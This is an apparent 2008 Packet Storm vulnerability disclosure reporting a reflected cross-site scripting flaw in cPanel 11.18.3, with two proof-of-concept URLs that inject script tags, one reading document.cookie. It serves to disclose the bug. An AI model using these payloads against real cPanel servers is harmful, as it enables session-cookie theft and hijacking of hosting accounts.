cpanel11183-xss.txt

2008-03-24T00:00:00
ID PACKETSTORM:64822
Type packetstorm
Reporter Linux_Drox
Modified 2008-03-24T00:00:00

Description

                                        
                                            `Hello  
  
I Discovered a new bug in cPanel ( xss )  
  
Exploit :  
  
http://example.com:2082/frontend/x/manpage.html?[XSS]  
  
Example :  
1-  
http://example.com:2082/frontend/x/manpage.html?<script>alert(LeZr)</script>  
  
2-  
http://example.com:2082/frontend/x/manpage.html?<script>alert(document.cookie)</script>  
  
tested on:  
cPanel V 11.18.3  
cPanel V 11.21.0-BETA  
  
Discovered By Linux_Drox  
  
Soon : Bypass Security of servers On cPanel 11.x  
  
www.LeZr.Com  
S-H-T  
`